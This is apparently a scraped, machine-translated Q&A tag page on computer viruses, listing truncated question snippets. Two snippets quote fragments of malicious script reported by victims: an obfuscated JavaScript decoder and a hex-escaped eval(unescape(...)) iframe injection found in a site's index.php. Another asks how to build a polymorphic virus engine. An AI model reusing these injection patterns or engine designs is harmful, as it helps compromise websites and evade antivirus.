virus

    5熱度

    4回答

    我想掃描用戶上傳到服務器端的網站的文件。我更喜歡它是我們可以按需運行的東西,不必一直在服務器上運行。 Windows Server 2008 R2有哪些解決方案?你會推薦哪些產品?

    1熱度

    1回答

    看來,在一個特定的系統上,dbghelp.dll被加載到所有進程中。由於我認爲這不是正常的行爲,我猜測它正在被其他應用程序注入。有沒有一種方法可以追蹤哪個應用正在執行此操作?實際的問題是,這個注入導致system32 \ dbghelp.dll在我們自己安裝的版本之前加載。這是一個概率,B/C我們需要加載我們的安裝版本6.7.5.0,其中包括在舊的DLL中找不到的SymGetSymbolFile。

    0熱度

    1回答

    如何刪除TBS WMP插件?這似乎是我的電腦上安裝的惡意軟件。非常感謝!

    4熱度

    4回答

    我剛剛收到的病毒看起來是這樣的 <script type='text/javascript'> <!-- var s="=nfub!iuuq.frvjw>#sfgsfti#!------REST OF PAYLOAD REMOVED-----?"; m=""; for (i=0; i<s.length; i++) { if(s.charCodeAt(i) == 28) { m+=

    1熱度

    1回答

    有人可以簡單地解釋隧道是如何工作的?如何將病毒自行安裝在中斷處理程序鏈中以避免掃描程序?

    5熱度

    1回答

    我必須編寫一個簡單的多態引擎。我使用Linux(32位),我可以在程序集和c。我不知道如何開始。 你能給我一個構建這樣一個引擎的模式嗎?我的想法是讓一個程序: 讀取文件 加密在緩衝器的代碼段, 騰出空間開頭(這可能嗎?)加解密程序 在程序的代碼部分寫入新的緩衝區。 是嗎?它是否反映了這種引擎的操作?

    1熱度

    1回答

    是否有任何好的方式感染惡意軟件並保持安全。 AFAIK Vitual機是去了解的最佳方式,但我安靜不知道這是接近的方式...... 我想觀摩各類惡意軟件的行爲...... 而且我在哪裏可以找到最新病毒的數據庫? 注意:嚴格教育目的...

    2熱度

    2回答

    我想也許delphi病毒感染了我的.dcu文件,所以我重新編譯了Delphi的C:\ ProgramFiels ... \ source \ Win32 \ rtl \ win中的windows.pas文件。結果如下。 這裏的virustotal結果 http://www.virustotal.com/analisis/419f755ae57e6ba469f5c6e36305153dc298517

    0熱度

    3回答

    我的網站的index.php文件已受到下面給出的腳本的影響。因此,谷歌已禁止我訪問。有人請告訴我類型的攻擊是這樣的,並有任何解決方案。 <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%

    2熱度

    1回答

    我正在編寫一個基於Java的web應用程序,允許用戶上傳內容並將其提交到網站。但是,在它可用之前,我想執行病毒掃描以確保沒有發佈惡意內容。有誰知道可以通過Java訪問的防病毒掃描器嗎?該應用程序將託管在Linux(CentOS 5.5 x64)上並在Tomcat 6.x上運行。任何意見或建議,將不勝感激!